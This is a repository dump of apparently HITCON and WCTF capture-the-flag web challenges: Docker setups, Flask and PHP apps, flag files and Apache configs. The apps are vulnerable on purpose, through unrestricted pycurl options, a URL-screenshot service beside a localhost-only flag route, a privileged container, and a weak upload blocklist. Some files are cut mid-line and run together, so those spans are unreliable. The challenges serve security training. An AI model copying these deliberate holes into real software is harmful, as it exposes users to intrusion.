/hitcon-ctf-2020/oStyle/oStyle/www/upload.php:
--------------------------------------------------------------------------------
1 | 0x1337) die('🤔');
17 | if (strstr($ext, 'x') != False) die('🤔');
18 | if (strstr($ext, 'ht') != False) die('🤔');
19 | if (strstr($ext, 'ph') != False) die('🤔');
20 | if (strstr($ext, 'ini') != False) die('🤔');
21 | if (strstr($ext, 'htm') != False) die('🤔');
22 | if (strstr($ext, 'xml') != False) die('🤔');
23 | if (strstr($ext, 'svg') != False) die('🤔');
24 | if (strstr($ext, 'app') != False) die('🤔');
25 |
26 | $dst = sprintf('%s/%s.%s', $upload_dir, md5_file($tmp_name), $ext);
27 | move_uploaded_file($tmp_name, $dst);
28 | echo htmlentities($dst);
--------------------------------------------------------------------------------
/hitcon-ctf-2021/FBI-Warning/src/1638537259302.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/FBI-Warning/src/1638537259302.jpg
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:20.04
2 | MAINTAINER orange@chroot.org
3 |
4 | EXPOSE 80/tcp
5 |
6 | RUN apt update && apt install -y libcurl4-openssl-dev openssl libssl-dev python3 python3-pip nfs-common
7 | RUN pip3 install pycurl flask certifi
8 |
9 | COPY app/ /app
10 | COPY files/readflag /readflag
11 | COPY files/flag /flag
12 | COPY files/entrypoint.sh /
13 |
14 | WORKDIR /app/
15 | CMD ["/entrypoint.sh"]
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/Makefile:
--------------------------------------------------------------------------------
1 | compile:
2 | gcc -o files/readflag files/readflag.c
3 |
4 | build: compile clean
5 | docker build -t metamon-verse . --no-cache
6 |
7 | test-run:
8 | docker run --rm -p 12345:80 --name test --add-host=nfs.server:host-gateway --log-driver=syslog --privileged=true --env CTF_PASSWD=ctf -t -i metamon-verse
9 |
10 | test-exec:
11 | docker exec -ti test /bin/bash
12 |
13 | pack: compile
14 | rm -rf static/metamon-verse.tgz
15 | tar --exclude='flag' --exclude='readflag.c' --transform='flags=r;s|fake-flag|flag|' -zcvf static/metamon-verse.tgz Dockerfile app/ files/
16 |
17 | mount:
18 | mount -t ext4 /dev/nvme1n1 /data
19 |
20 | clean:
21 | -docker rm -f `docker ps -a -q`
22 | -docker rmi -f `docker images -a -q`
23 |
24 | run: pack
25 | python3 run.py 2>&1 | tee -a logs/log.txt
26 |
27 | debug-run:
28 | python3 run.py debug
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/app/app.py:
--------------------------------------------------------------------------------
1 | # coding: UTF-8
2 | import os, sys
3 | from hashlib import md5
4 | from functools import wraps
5 | from flask import Flask, render_template, request
6 |
7 | import pycurl
8 | import certifi
9 |
10 | PORT = 80
11 |
12 | def login_required(f):
13 | @wraps(f)
14 | def wrapped_view(**kwargs):
15 | def check_auth(username, password):
16 | return username == 'ctf' and password == os.environ['CTF_PASSWD']
17 | auth = request.authorization
18 | if not (auth and check_auth(auth.username, auth.password)):
19 | return ('Unauthorized', 401, {
20 | 'WWW-Authenticate': 'Basic realm="Login Required"'
21 | })
22 |
23 | return f(**kwargs)
24 |
25 | return wrapped_view
26 |
27 | app = Flask(__name__)
28 | app.config['TEMPLATES_AUTO_RELOAD'] = True
29 |
30 | @app.route('/', methods=['GET'])
31 | @login_required
32 | def index():
33 | return render_template('index.html')
34 |
35 | @app.route('/', methods=['POST'])
36 | @login_required
37 | def submit():
38 | url = request.form.get('url')
39 | if not url:
40 | return render_template('index.html', msg='empty url')
41 |
42 | opt_name, opt_value = None, None
43 | for key, value in request.form.items():
44 | if key.startswith('CURLOPT_'):
45 | name = key.split('_', 1)[1].upper()
46 | try:
47 | opt_name = getattr(pycurl, name)
48 | opt_name = int(opt_name)
49 | opt_value = int(value)
50 | except (AttributeError, ValueError, TypeError):
51 | break
52 |
53 | break
54 |
55 | name = md5(request.remote_addr.encode() + url.encode()).hexdigest()
56 | filename = 'static/images/%s.jpg' % name
57 | with open(filename, 'wb+') as fp:
58 | c = pycurl.Curl()
59 | c.setopt(c.URL, url)
60 | c.setopt(c.WRITEDATA, fp)
61 | c.setopt(c.CAINFO, certifi.where())
62 |
63 | if opt_name and opt_value:
64 | c.setopt(opt_name, opt_value)
65 |
66 | try:
67 | c.perform()
68 | c.close()
69 | msg = filename
70 | except pycurl.error as e:
71 | msg = str(e)
72 |
73 | return render_template('index.html', msg=msg)
74 |
75 | if __name__ == '__main__':
76 | if 'debug' in sys.argv:
77 | app.debug = True
78 | PORT = 8000
79 |
80 | app.run('0.0.0.0', PORT)
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/app/static/bg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/app/static/bg.jpg
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/app/templates/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Metamon-Verse
5 |
6 |
7 |
8 |
9 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | Metamon-Verse
42 |
43 |
44 |
45 |
46 |
47 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 | {% if msg and msg.startswith('static') %}
69 | Your Metamon
70 | {% else %}
71 | {{ msg }}
72 | {% endif %}
73 |
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/files/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # perm
4 | chown nobody.nogroup -R /app/*
5 | chown root.root /*flag
6 | chmod 400 /flag
7 | chmod 111 /readflag
8 | chmod +s /readflag
9 |
10 | # service
11 | mkdir /data
12 | ln -s /data/ /app/static/images
13 | mount -t nfs nfs.server:/data /data -o nolock
14 |
15 | # run
16 | timeout -s 9 900 su -s /bin/bash nobody -c 'python3 /app/app.py'
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/files/fake-flag:
--------------------------------------------------------------------------------
1 | hitcon{this-is-fake-flag}
2 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/files/flag:
--------------------------------------------------------------------------------
1 | hitcon{OwO! >>> https://youtu.be/4pusrSxa6wI <<<}
2 | # I know privileged-container is bad but it's necessary. Please don't escape it :(
3 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/files/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/files/readflag
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/files/readflag.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | // gcc -static -o readflag ./readflag.c
4 | int main(){
5 | char s[1024] = {0};
6 | FILE *fp = fopen("/flag", "rb");
7 | fread(&s, 1, 1024, fp);
8 | printf("%s", s);
9 | }
10 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/run.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import os, sys
4 | import uuid
5 | from random import shuffle
6 | from subprocess import run, PIPE
7 |
8 | from flask import Flask, request, make_response
9 | from redis import Redis
10 |
11 | '''
12 | pip install redis
13 | apt install redis-server
14 | '''
15 |
16 | PORT = 80
17 | PUBLIC_ADDRESS = '54.250.88.37'
18 | AVAILABLE_PORTS = list(range(20000, 40000))
19 | shuffle(AVAILABLE_PORTS)
20 |
21 | INDEX = '''
22 | Your Metamon-Verse is launched, please login with ctf / {PASS}
23 |
24 | Exec Command:
> {CMD}
25 | Exec Result:
> {RES}
26 | '''
27 |
28 |
29 | app = Flask(__name__)
30 | conn = Redis(host='127.0.0.1', password='')
31 |
32 | def my_exec(cmds):
33 | return run(cmds, stdout=PIPE, stderr=PIPE)
34 |
35 | def response(msg):
36 | msg = "\n" + msg
37 | return msg
38 |
39 | @app.route('/')
40 | def index():
41 | msg = ''
42 | msg += 'Download Dockerfile [Hint]
\n'
43 | msg += '
\n'
46 | msg += 'P.S. We limit the docker-lanching rate (once per minute) by your IP address.'
47 | return msg
48 |
49 | @app.route('/', methods=['POST'])
50 | def submit():
51 | key = 'lock_%s' % request.remote_addr
52 | if conn.get(key):
53 | return response('too quick... %d second remaining' % conn.ttl(key))
54 | else:
55 | conn.setex(key, 60, 'ok')
56 |
57 | password = uuid.uuid4().hex[:16]
58 | port = AVAILABLE_PORTS.pop()
59 | name = 'team-%s' % uuid.uuid4().hex[:16]
60 |
61 | launch_cmd = [
62 | 'docker', 'run', '--rm',
63 | '-p', '%d:80' % port,
64 | '--name', name,
65 | '--add-host=nfs.server:host-gateway',
66 | '--log-driver=syslog',
67 | '--privileged',
68 | '--env', 'CTF_PASSWD=%s' % password,
69 | '-itd', 'metamon-verse'
70 | ]
71 | p = my_exec(launch_cmd)
72 | result = p.stdout.decode()
73 | if p.stderr:
74 | result = p.stderr.decode()
75 |
76 | msg = INDEX.strip()
77 | msg = msg.replace('{BASE}', 'http://%s:%d/' % (PUBLIC_ADDRESS, port))
78 | msg = msg.replace('{PASS}', password)
79 | msg = msg.replace('{CMD}', ' '.join(launch_cmd))
80 | msg = msg.replace('{RES}', result)
81 | return response(msg)
82 |
83 | if __name__ == '__main__':
84 | if 'debug' in sys.argv:
85 | app.debug = True
86 | PORT = 80
87 |
88 | print('Listening on http://%s:%d/' % (PUBLIC_ADDRESS, PORT))
89 | app.run('0.0.0.0', PORT)
90 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/static/hint.txt:
--------------------------------------------------------------------------------
1 | As for the `nfs.server`, whatever NFS server is OK. Once your NFS server is up and the image-saving feature works fine on your local environmental, you have everything to solve the challenge!
2 |
3 | To be more clear, here is my NFS setup:
4 |
5 | $ apt install -y nfs-kernel-server nfs-common rpcbind
6 | $ cat /etc/export
7 | /data 172.16.0.0/12(rw,sync)
8 | $ mkdir /data
9 | $ chown nobody.nogroup /data
10 | $ service nfs-kernel-server start
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Metamon-Verse/static/metamon-verse.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Metamon-Verse/static/metamon-verse.tgz
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM wordpress:5.8.2-apache
2 | MAINTAINER orange@chroot.org
3 |
4 | EXPOSE 80/tcp
5 |
6 | RUN DEBIAN_FRONTEND=noninteractive apt update && apt install -y --no-install-recommends mariadb-server
7 |
8 | COPY files/entrypoint.sh /entrypoint.sh
9 | COPY files/init.sql /init.sql
10 | COPY files/hack.php /hack.php
11 | COPY files/htaccess /var/www/html/.htaccess
12 | COPY files/readflag /readflag
13 | COPY files/flag /flag
14 |
15 | WORKDIR /var/www/html/
16 | CMD ["/entrypoint.sh"]
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/Makefile:
--------------------------------------------------------------------------------
1 | compile:
2 | gcc -o files/readflag files/readflag.c
3 |
4 | build: compile clean
5 | docker build -t one-bit-man . --no-cache
6 |
7 | test-run:
8 | docker run --rm -p 12345:80 --name test --log-driver="syslog" --env CTF_PASSWD=ctf --env "CTF_BASE=http://192.168.11.11:12345/" --env "CTF_FILENAME=/var/www/html/index.php" --env "CTF_POSITION=0" --env "CTF_BITPOS=0" -ti one-bit-man
9 |
10 | test-exec:
11 | docker exec -ti test /bin/bash
12 |
13 | pack: compile
14 | rm -rf static/one-bit-man.tgz
15 | tar --exclude='flag' --exclude='readflag.c' --transform='flags=r;s|fake-flag|flag|' -zcvf static/one-bit-man.tgz Dockerfile files/
16 |
17 | run: pack
18 | python3 run.py 2>&1 | tee -a logs/log.txt
19 |
20 | debug-run:
21 | python3 run.py debug
22 |
23 | clean:
24 | -docker rm -f `docker ps -a -q`
25 | -docker rmi -f `docker images -a -q`
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | export WORDPRESS_DB_HOST='127.0.0.1'
4 | export WORDPRESS_DB_USER='wordpress'
5 | export WORDPRESS_DB_PASSWORD='wordpress'
6 | export WORDPRESS_DB_NAME='wordpress'
7 |
8 | echo "CTF_BASE=$CTF_BASE"
9 | echo "CTF_PASSWD=$CTF_PASSWD"
10 | echo "CTF_FILENAME=$CTF_FILENAME"
11 | echo "CTF_POSITION=$CTF_POSITION"
12 | echo "CTF_BITPOS=$CTF_BITPOS"
13 |
14 | # check
15 | if [[ -z $CTF_BASE || -z $CTF_PASSWD ]]; then
16 | echo "env CTF_BASE or CTF_PASSWD not found"
17 | exit -1
18 | fi
19 |
20 | if [[ -z $CTF_FILENAME || -z $CTF_POSITION || -z $CTF_BITPOS ]]; then
21 | echo "env PHP-Hack not found"
22 | exit -1
23 | fi
24 |
25 | # perm
26 | chown root.root /*flag
27 | chmod 400 /flag
28 | chmod 111 /readflag
29 | chmod +s /readflag
30 |
31 | # db
32 | service mariadb start
33 | mysqladmin create wordpress && mysqladmin password root
34 | sed -i 's@{BASE}@'"$CTF_BASE"'@g' /init.sql
35 | mysql -uroot -proot < /init.sql
36 |
37 | # web
38 | htpasswd -cb /etc/apache2/.htpasswd ctf "$CTF_PASSWD"
39 |
40 | # flip the bit with some dirty hacks...
41 | sed -i 's/exec "$@"//' /usr/local/bin/docker-entrypoint.sh
42 | cat << EOF >> /usr/local/bin/docker-entrypoint.sh
43 |
44 | result=\$(php /hack.php "\$CTF_FILENAME" "\$CTF_POSITION" "\$CTF_BITPOS")
45 | if [[ "\$result" != "all good" ]]; then
46 | echo \$result
47 | exit -1
48 | fi
49 |
50 | exec "\$@"
51 | EOF
52 |
53 | # original command
54 | timeout -s 9 900 docker-entrypoint.sh apache2-foreground
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/fake-flag:
--------------------------------------------------------------------------------
1 | hitcon{this-is-fake-flag}
2 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/flag:
--------------------------------------------------------------------------------
1 | hitcon{if your solution is l33t, please share it!}
2 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/hack.php:
--------------------------------------------------------------------------------
1 | 7)
19 | die('bit error');
20 |
21 | $content = file_get_contents($filename);
22 |
23 | $head = substr($content, 0, $position);
24 | $byte = substr($content, $position, 1);
25 | $tail = substr($content, $position + 1);
26 |
27 | $byte = chr( ord($byte) ^ (1<<$bit_pos) );
28 |
29 | file_put_contents($filename, $head . $byte . $tail);
30 | echo 'all good';
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/htaccess:
--------------------------------------------------------------------------------
1 | AuthType Basic
2 | AuthName CTF
3 | AuthUserFile /etc/apache2/.htpasswd
4 | Require valid-user
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/readflag:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/files/readflag
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/files/readflag.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | // gcc -static -o readflag ./readflag.c
4 | int main(){
5 | char s[1024] = {0};
6 | FILE *fp = fopen("/flag", "rb");
7 | fread(&s, 1, 1024, fp);
8 | printf("%s", s);
9 | }
10 |
11 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/static/one-bit-man.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/static/one-bit-man.tgz
--------------------------------------------------------------------------------
/hitcon-ctf-2021/One-Bit-Man/wordpress.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/wordpress.tgz
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM selenium/standalone-chrome
2 | MAINTAINER orange@chroot.org
3 |
4 | EXPOSE 8000/tcp
5 |
6 | USER root
7 |
8 | RUN apt update && apt install --no-install-recommends -y python3-pip
9 | RUN pip3 install selenium flask pillow flask flask-limiter
10 |
11 | COPY app/ /app
12 | COPY files/secret /secret
13 | COPY files/read_secret /read_secret
14 | COPY files/entrypoint.sh /
15 |
16 | WORKDIR /app/
17 | CMD ["/entrypoint.sh"]
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/Makefile:
--------------------------------------------------------------------------------
1 | compile:
2 | gcc -o files/read_secret files/read_secret.c
3 |
4 | build: compile clean
5 | docker build -t vulpixelize . --no-cache
6 |
7 | test:
8 | docker run --rm -p 12345:8000 --name test --log-driver="syslog" --env CTF_PASSWD=ctf -ti vulpixelize
9 |
10 | pack: compile
11 | rm -rf static/vulpixelize.tgz
12 | tar --exclude='secret' --exclude='read_secret.c' --transform='flags=r;s|fake-secret|secret|' -zcvf static/vulpixelize.tgz Dockerfile app/ files/
13 |
14 | flag:
15 | python3 -c 's=__import__("hashlib").md5(open("files/secret").read().encode()).hexdigest();print("hitcon{" + "-".join(list(s)) + "}")'
16 |
17 | run: pack
18 | python3 run.py 2>&1 | tee -a logs/log.txt
19 |
20 | clean:
21 | -docker rm -f `docker ps -a -q`
22 | -docker rmi -f `docker images -a -q`
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/app/app.py:
--------------------------------------------------------------------------------
1 | # coding: UTF-8
2 | import io, os, sys, uuid
3 |
4 | from subprocess import run, PIPE
5 | from hashlib import md5
6 |
7 | from PIL import Image
8 | from selenium import webdriver, common
9 | from flask import Flask, render_template, request
10 |
11 | secret = run(['/read_secret'], stdout=PIPE).stdout
12 | FLAG = 'hitcon{%s}' % '-'.join(md5(secret).hexdigest())
13 | def init_chrome():
14 | options = webdriver.ChromeOptions()
15 | options.add_argument('--headless')
16 | options.add_argument('--disable-gpu')
17 | options.add_argument('--disable-dev-shm-usage')
18 | options.add_argument('--window-size=1920x1080')
19 | options.add_experimental_option("prefs", {
20 | 'download.prompt_for_download': True,
21 | 'download.default_directory': '/dev/null'
22 | })
23 |
24 | driver = webdriver.Chrome(options=options)
25 | driver.set_page_load_timeout(5)
26 | driver.set_script_timeout(5)
27 |
28 | return driver
29 |
30 | def message(msg):
31 | return render_template('index.html', msg=msg)
32 |
33 | ### initialize ###
34 | driver = init_chrome()
35 | app = Flask(__name__)
36 | ### initialize ###
37 |
38 |
39 | @app.route('/flag')
40 | def flag():
41 | if request.remote_addr == '127.0.0.1':
42 | return message(FLAG)
43 | return message("allow only from local")
44 |
45 | @app.route('/', methods=['GET'])
46 | def index():
47 | return render_template('index.html')
48 |
49 | @app.route('/submit', methods=['GET'])
50 | def submit():
51 | path = 'static/images/%s.png' % uuid.uuid4().hex
52 | url = request.args.get('url')
53 | if url:
54 | # secrity check
55 | if not url.startswith('http://') and not url.startswith('https://'):
56 | return message(msg='malformed url')
57 |
58 | # access url
59 | try:
60 | driver.get(url)
61 | data = driver.get_screenshot_as_png()
62 | except common.exceptions.WebDriverException as e:
63 | return message(msg=str(e))
64 |
65 | # save result
66 | img = Image.open(io.BytesIO(data))
67 | img = img.resize((64,64), resample=Image.BILINEAR)
68 | img = img.resize((1920,1080), Image.NEAREST)
69 | img.save(path)
70 |
71 | return message(msg=path)
72 | else:
73 | return message(msg="url not found :(")
74 |
75 | if __name__ == '__main__':
76 | app.run('0.0.0.0', 8000)
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/app/static/bg.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/app/static/bg.jpg
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/app/templates/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Vulpixelize
5 |
6 |
7 |
8 |
9 |
39 |
40 |
41 |
42 |
43 |
44 |
45 | Vulpixelize
46 |
47 |
48 |
49 |
50 |
51 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 | {% if msg and msg.startswith('static') %}
69 | Your Vulpix
70 | {% else %}
71 | {{ msg }}
72 | {% endif %}
73 |
74 |
75 |
76 |
77 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/files/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # perm
4 | chown root.root /*secret
5 | chmod 400 /secret
6 | chmod 111 /read_secret
7 | chmod +s /read_secret
8 | chown seluser.seluser /app/static/images/
9 |
10 |
11 | # run
12 | timeout -s 9 900 su -s /bin/bash seluser -c 'python3 /app/app.py'
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/files/fake-secret:
--------------------------------------------------------------------------------
1 | this-is-fake-secret
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/files/read_secret:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/files/read_secret
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/files/read_secret.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | // gcc -static -o read_secret ./read_secret.c
4 | int main(){
5 | char s[1024] = {0};
6 | FILE *fp = fopen("/secret", "rb");
7 | fread(&s, 1, 1024, fp);
8 | printf("%s", s);
9 | }
10 |
11 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/files/secret:
--------------------------------------------------------------------------------
1 | ohmygod you are awesome!!!!!!!!!!!!!!!! https://youtu.be/Q5aoackIasE
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/run.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import os, sys
4 | import uuid
5 | from random import shuffle
6 | from subprocess import run, PIPE
7 |
8 | from flask import Flask, request, make_response
9 | from redis import Redis
10 |
11 | '''
12 | pip install redis
13 | apt install redis-server
14 | '''
15 |
16 | PUBLIC_ADDRESS = '3.113.172.41'
17 | AVAILABLE_PORTS = list(range(20000, 40000))
18 | shuffle(AVAILABLE_PORTS)
19 |
20 | INDEX = '''
21 | Your Vulpixelize is launched!
22 |
23 | Exec Command:
> {CMD}
24 | Exec Result:
> {RES}
25 | '''
26 |
27 |
28 | app = Flask(__name__)
29 | conn = Redis(host='127.0.0.1', password='')
30 |
31 | def my_exec(cmds):
32 | return run(cmds, stdout=PIPE, stderr=PIPE)
33 |
34 | def response(msg):
35 | msg = "\n" + msg
36 | return msg
37 |
38 | @app.route('/')
39 | def index():
40 | msg = ''
41 | msg += 'Download Dockerfile
\n'
42 | msg += '
\n'
45 | msg += 'P.S. We limit the docker-lanching rate (once per minute) by your I P address.'
46 | return msg
47 |
48 | @app.route('/', methods=['POST'])
49 | def submit():
50 | key = 'lock_%s' % request.remote_addr
51 | # if conn.get(key):
52 | # return response('too quick... %d second remaining' % conn.ttl(key))
53 | # else:
54 | # conn.setex(key, 60, 'ok')
55 |
56 | port = AVAILABLE_PORTS.pop()
57 | name = 'team-%s' % uuid.uuid4().hex[:16]
58 |
59 | launch_cmd = [
60 | 'docker', 'run', '--rm',
61 | '-p', '%d:8000' % port,
62 | '--name', name,
63 | '--log-driver=syslog',
64 | '-itd', 'vulpixelize'
65 | ]
66 | p = my_exec(launch_cmd)
67 | result = p.stdout.decode()
68 | if p.stderr:
69 | result = p.stderr.decode()
70 |
71 | msg = INDEX.strip()
72 | msg = msg.replace('{BASE}', 'http://%s:%d/' % (PUBLIC_ADDRESS, port))
73 | msg = msg.replace('{CMD}', ' '.join(launch_cmd))
74 | msg = msg.replace('{RES}', result)
75 | return response(msg)
76 |
77 | if __name__ == '__main__':
78 | print('Listening on http://%s:%d/' % (PUBLIC_ADDRESS, 80))
79 | app.run('0.0.0.0', 80)
80 |
--------------------------------------------------------------------------------
/hitcon-ctf-2021/Vulpixelize/static/vulpixelize.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/static/vulpixelize.tgz
--------------------------------------------------------------------------------
/hitcon-ctf-2021/W3rmup-PHP/index.php:
--------------------------------------------------------------------------------
1 |
9 | # AllowOverride None
10 | # Require all denied
11 | #
12 |
13 |
14 | # Changing the following options will not really affect the security of the
15 | # server, but might make attacks slightly more difficult in some cases.
16 |
17 | #
18 | # ServerTokens
19 | # This directive configures what you return as the Server HTTP response
20 | # Header. The default is 'Full' which sends information about the OS-Type
21 | # and compiled in modules.
22 | # Set to one of: Full | OS | Minimal | Minor | Major | Prod
23 | # where Full conveys the most information, and Prod the least.
24 | #ServerTokens Minimal
25 | ServerTokens OS
26 | #ServerTokens Full
27 |
28 | #
29 | # Optionally add a line containing the server version and virtual host
30 | # name to server-generated pages (internal error documents, FTP directory
31 | # listings, mod_status and mod_info output etc., but not CGI generated
32 | # documents or custom error documents).
33 | # Set to "EMail" to also include a mailto: link to the ServerAdmin.
34 | # Set to one of: On | Off | EMail
35 | #ServerSignature Off
36 | ServerSignature On
37 |
38 | #
39 | # Allow TRACE method
40 | #
41 | # Set to "extended" to also reflect the request body (only for testing and
42 | # diagnostic purposes).
43 | #
44 | # Set to one of: On | Off | extended
45 | TraceEnable Off
46 | #TraceEnable On
47 |
48 | #
49 | # Forbid access to version control directories
50 | #
51 | # If you use version control systems in your document root, you should
52 | # probably deny access to their directories. For example, for subversion:
53 | #
54 | #
55 | # Require all denied
56 | #
57 |
58 | #
59 | # Setting this header will prevent MSIE from interpreting files as something
60 | # else than declared by the content type in the HTTP headers.
61 | # Requires mod_headers to be enabled.
62 | #
63 | #Header set X-Content-Type-Options: "nosniff"
64 |
65 | #
66 | # Setting this header will prevent other sites from embedding pages from this
67 | # site as frames. This defends against clickjacking attacks.
68 | # Requires mod_headers to be enabled.
69 | #
70 | #Header set X-Frame-Options: "sameorigin"
71 |
72 |
73 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
74 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/conf-enabled/serve-cgi-bin.conf:
--------------------------------------------------------------------------------
1 |
2 |
3 | Define ENABLE_USR_LIB_CGI_BIN
4 |
5 |
6 |
7 | Define ENABLE_USR_LIB_CGI_BIN
8 |
9 |
10 |
11 | ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
12 |
13 | AllowOverride None
14 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
15 | Require all granted
16 |
17 |
18 |
19 |
20 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
21 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/envvars:
--------------------------------------------------------------------------------
1 | # envvars - default environment variables for apache2ctl
2 |
3 | # this won't be correct after changing uid
4 | unset HOME
5 |
6 | # for supporting multiple apache2 instances
7 | if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then
8 | SUFFIX="-${APACHE_CONFDIR##/etc/apache2-}"
9 | else
10 | SUFFIX=
11 | fi
12 |
13 | # Since there is no sane way to get the parsed apache2 config in scripts, some
14 | # settings are defined via environment variables and then used in apache2ctl,
15 | # /etc/init.d/apache2, /etc/logrotate.d/apache2, etc.
16 | export APACHE_RUN_USER=www-data
17 | export APACHE_RUN_GROUP=www-data
18 | # temporary state file location. This might be changed to /run in Wheezy+1
19 | export APACHE_PID_FILE=/var/run/apache2/apache2$SUFFIX.pid
20 | export APACHE_RUN_DIR=/var/run/apache2$SUFFIX
21 | export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX
22 | # Only /var/log/apache2 is handled by /etc/logrotate.d/apache2.
23 | export APACHE_LOG_DIR=/var/log/apache2$SUFFIX
24 |
25 | ## The locale used by some modules like mod_dav
26 | export LANG=C
27 | ## Uncomment the following line to use the system default locale instead:
28 | #. /etc/default/locale
29 |
30 | export LANG
31 |
32 | ## The command to get the status for 'apache2ctl status'.
33 | ## Some packages providing 'www-browser' need '--dump' instead of '-dump'.
34 | #export APACHE_LYNX='www-browser -dump'
35 |
36 | ## If you need a higher file descriptor limit, uncomment and adjust the
37 | ## following line (default is 8192):
38 | #APACHE_ULIMIT_MAX_FILES='ulimit -n 65536'
39 |
40 | ## If you would like to pass arguments to the web server, add them below
41 | ## to the APACHE_ARGUMENTS environment.
42 | #export APACHE_ARGUMENTS=''
43 |
44 | ## Enable the debug mode for maintainer scripts.
45 | ## This will produce a verbose output on package installations of web server modules and web application
46 | ## installations which interact with Apache
47 | #export APACHE2_MAINTSCRIPT_DEBUG=1
48 |
--------------------------------------------------------------------------------
/wctf-2016/BlackBox/apache2/mods-enabled/jk.load:
--------------------------------------------------------------------------------
1 | LoadModule jk_module /usr/lib/apache2/modules/mod_jk.so
2 |
